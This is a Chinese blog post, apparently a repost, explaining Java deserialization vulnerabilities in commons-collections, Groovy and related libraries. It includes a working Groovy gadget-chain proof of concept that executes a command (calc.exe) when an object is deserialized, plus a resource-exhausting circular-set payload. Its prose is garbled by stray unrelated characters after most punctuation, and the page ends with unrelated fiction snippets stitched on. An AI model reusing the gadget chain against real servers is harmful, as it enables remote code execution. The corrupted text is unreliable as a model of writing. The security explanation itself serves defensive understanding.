JAVA 反序列化攻擊

Java 反序列化攻擊漏洞由 FoxGlove 的最近的一篇博文爆出骄噪,該漏洞可以被黑客利用向服務(wù)器上傳惡意腳本尚困,或者遠程執(zhí)行命令。

由于目前發(fā)現(xiàn)該漏洞存在于 Apache commons-collections链蕊, Apache xalan 和 Groovy 包中事甜,也就意味著使用了這些包的服務(wù)器(目前發(fā)現(xiàn)有WebSphere, WebLogic滔韵,JBoss)逻谦,第三方框架(Spring,Groovy)奏属,第三方應(yīng)用(Jenkins)跨跨,以及依賴于這些服務(wù)器,框架或者直接/間接引用這些包的應(yīng)用都會受到威脅囱皿,這樣的應(yīng)用的數(shù)量會以百萬計勇婴。

說到漏洞存在的原因,根本還在于 Java 序列化自身的缺陷嘱腥,眾所周知耕渴,序列化的目的是使 Java 對象轉(zhuǎn)化成字節(jié)流,方便存儲或者網(wǎng)絡(luò)上傳輸齿兔。Java 對象分解成字節(jié)碼過程叫做序列化橱脸,從字節(jié)碼組裝成 Java 對象的過程叫做反序列化,這兩個過程分別對應(yīng)于的 writeObject 和 readObject 方法分苇。問題在于 readObject 在利用字節(jié)流組裝 Java 對象時不會調(diào)用構(gòu)造函數(shù)添诉, 也就意味著沒有任何類型的檢查,用戶可以復(fù)寫 readObject() 方法執(zhí)行任何希望執(zhí)行的代碼医寿。

這可能會導(dǎo)致三方面問題:

1. 序列化對象修改了對象或者父類的某個未加保護的關(guān)鍵屬性栏赴,導(dǎo)致未預(yù)料的結(jié)果。
例如:

class Client {
private int value;
public Client(int v) {
        if (v <= 0) {
            throw new RuntimeException("not positive number");
        }
        value = v;
    }
    public void writeObject(ObjectOutputStream oos) throws IOException {
        int value = 0; //這里該值被改為0靖秩。(現(xiàn)實中可以通過調(diào)試模式须眷,修改serialize字節(jié)碼或者class instrument等多種方式修改該值)
        oos.defaultWriteObject();
    }
}
class Controller {
    private ArrayBlockingQueue<Client> queue;
    public void receiveState(ObjectInputStream o) throws IOException, ClassNotFoundException {
        Client s = (Client)o.readObject(); //反序列化不調(diào)用構(gòu)造函數(shù),value的非零檢查不會觸發(fā)
        queue.add(s);
    }
    public Client getClient() throws InterruptedException {
        return (Client)queue.take();
    }
}
class Server extends Thread {
    private Controller controller = new Controller();
    private int result = 100;
    public void run() {
        while (true) {
            try {
                result = result / controller.getClient().getValue(); // 由于value是0沟突,會導(dǎo)致算數(shù)異常花颗,線程結(jié)束
                Thread.sleep(100);
            } catch (InterruptedException e) {}
        }
    }
}

2. 攻擊者可以創(chuàng)建循環(huán)對象鏈,然后序列化惠拭。會導(dǎo)致反序列化無法結(jié)束, 空耗系統(tǒng)資源扩劝。例如:

Set root = new HashSet();
Set s1 = root;
Set s2 = new HashSet();
for (int i = 0; i < 10; i++) {
  Set t1 = new HashSet();
  Set t2 = new HashSet();
  t1.add("foo"); //使t2不等于t1
  s1.add(t1);
  s1.add(t2);
  s2.add(t1);
  s2.add(t2);
  s1 = t1;
  s2 = t2; 
}

3. 用戶在收到序列化對象流時可以選擇存儲在本地,以后再處理棒呛。由于沒有任何校驗機制葡公,使得上傳惡意程序成為可能。

class Controller {
    public void receiveState(ObjectInputStream ois) {
        FileOutputStream fos = new FileOutputStream(new File("xxx.ser"));
        fos.write(ois); //實際并不知道存的是什么条霜,可能是惡意腳本。
        fos.close();
    }
}

那么這次由 FoxGlove 暴露出來的 Serialization Attack 具體是怎樣呢涵亏?下面是 Groovy 的一個例子:

public class GroovyTest {
public static void main(String[] args) throws Exception {
    final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("calc.exe", "execute"), "entrySet");
    Class<?>[] clsArr = {Map.class};
    final Map map = Map.class.cast(Proxy.newProxyInstance(GroovyTest.class.getClassLoader(), clsArr, closure));
    final Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
    ctor.setAccessible(true);
    final InvocationHandler handler = (InvocationHandler)ctor.newInstance(Override.class, map);
    ByteArrayOutputStream bos = new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(bos);
    oos.writeObject(handler);
    byte[] bytes = bos.toByteArray(); //對象被序列化
    ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
    ObjectInputStream ois = new ObjectInputStream(bis);
    ois.readObject(); //反序列化時calc.exe被執(zhí)行
}
}

在這個例子中宠默,ConvertedClosure 會把一個 Closure 對象映射成 Java 的 entrySet 方法抹沪,而在AnnotationInvocationHandler 的 readObject 方法中融欧,會嘗試調(diào)用 entrySet() 方法噪馏,這會觸發(fā) calc.exe 的調(diào)用拟赊。

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
    var1.defaultReadObject();
    AnnotationType var2 = null;

    try {
        var2 = AnnotationType.getInstance(this.type);
    } catch (IllegalArgumentException var9) {
        throw new InvalidObjectException("Non-annotation type in annotation serial stream");
    }

    Map var3 = var2.memberTypes();
    Iterator var4 = this.memberValues.entrySet().iterator();

    while(var4.hasNext()) {
        Entry var5 = (Entry)var4.next();
        String var6 = (String)var5.getKey();
        Class var7 = (Class)var3.get(var6);
        if(var7 != null) {
            Object var8 = var5.getValue();
            if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
            }
        }
    }
}

針對這個問題,F(xiàn)oxGlove Security 提到開發(fā)者不應(yīng)該反序列化任何不信任的數(shù)據(jù)欢搜,而實際情況卻是開發(fā)者對該問題的危害沒有足夠的認知,他提到一種激進的做法那就是如果你足夠勇敢可以嘗試掃描并刪除存在反序列化漏洞的類吹埠,但是實際情況是第一沒有人敢于冒這種風(fēng)險缘琅,第二,當(dāng)應(yīng)用對象的依賴關(guān)系會很復(fù)雜,反序列化過程會導(dǎo)致很多關(guān)聯(lián)對象被創(chuàng)建雷酪,所以掃描不能保證所有的問題類被發(fā)現(xiàn)蔗怠。

然而幸運的是,這個問題引起了一些安全公司的重視,在他們推出的 RASP(Runtime Application Security Protection)產(chǎn)品中會在應(yīng)用運行期對該漏洞進行防護策治。

本文轉(zhuǎn)自 OneAPM 官方博客

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌延旧,老刑警劉巖迁沫,帶你破解...
    沈念sama閱讀 221,576評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件集畅,死亡現(xiàn)場離奇詭異祷愉,居然都是意外死亡谣辞,警方通過查閱死者的電腦和手機沪摄,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,515評論 3 399
  • 文/潘曉璐 我一進店門杨拐,熙熙樓的掌柜王于貴愁眉苦臉地迎上來哺壶,“玉大人敢课,你說我怎么就攤上這事鞭盟∫吒澹” “怎么了?”我有些...
    開封第一講書人閱讀 168,017評論 0 360
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經(jīng)常有香客問我籽慢,道長,這世上最難降的妖魔是什么氢卡? 我笑而不...
    開封第一講書人閱讀 59,626評論 1 296
  • 正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上账磺,老公的妹妹穿的比我還像新娘碧聪。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 68,625評論 6 397
  • 文/花漫 我一把揭開白布蔑祟。 她就那樣靜靜地躺著译蒂,像睡著了一般嘉冒。 火紅的嫁衣襯著肌膚如雪礼饱。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,255評論 1 308
  • 那天究驴,我揣著相機與錄音镊绪,去河邊找鬼。 笑死洒忧,一個胖子當(dāng)著我的面吹牛蝴韭,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播熙侍,決...
    沈念sama閱讀 40,825評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼榄鉴,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了蛉抓?” 一聲冷哼從身側(cè)響起牢硅,我...
    開封第一講書人閱讀 39,729評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎芝雪,沒想到半個月后减余,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,271評論 1 320
  • 正文 獨居荒郊野嶺守林人離奇死亡惩系,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,363評論 3 340
  • 正文 我和宋清朗相戀三年位岔,在試婚紗的時候發(fā)現(xiàn)自己被綠了如筛。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,498評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡抒抬,死狀恐怖杨刨,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情擦剑,我是刑警寧澤妖胀,帶...
    沈念sama閱讀 36,183評論 5 350
  • 正文 年R本政府宣布,位于F島的核電站惠勒,受9級特大地震影響赚抡,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜纠屋,卻給世界環(huán)境...
    茶點故事閱讀 41,867評論 3 333
  • 文/蒙蒙 一涂臣、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧售担,春花似錦赁遗、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,338評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至哥攘,卻和暖如春剖煌,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背献丑。 一陣腳步聲響...
    開封第一講書人閱讀 33,458評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留侠姑,地道東北人创橄。 一個月前我還...
    沈念sama閱讀 48,906評論 3 376
  • 正文 我出身青樓,卻偏偏與公主長得像莽红,于是被迫代替她去往敵國和親妥畏。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,507評論 2 359

推薦閱讀更多精彩內(nèi)容

  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理安吁,服務(wù)發(fā)現(xiàn)醉蚁,斷路器,智...
    卡卡羅2017閱讀 134,696評論 18 139
  • JAVA序列化機制的深入研究 對象序列化的最主要的用處就是在傳遞,和保存對象(object)的時候,保證對象的完整...
    時待吾閱讀 10,872評論 0 24
  • 一鬼店、 序列化和反序列化概念 Serialization(序列化)是一種將對象以一連串的字節(jié)描述的過程网棍;反序列化de...
    步積閱讀 1,444評論 0 10
  • 一、背景 2015年11月6日FoxGlove Security安全團隊的@breenmachine 發(fā)布了一篇長...
    Jewel591閱讀 16,608評論 0 4
  • 先是大致掃了一下妇智,cs的分布滥玷,發(fā)現(xiàn)cs真的是一個方向非常廣的學(xué)科氏身。
    M小生閱讀 119評論 0 0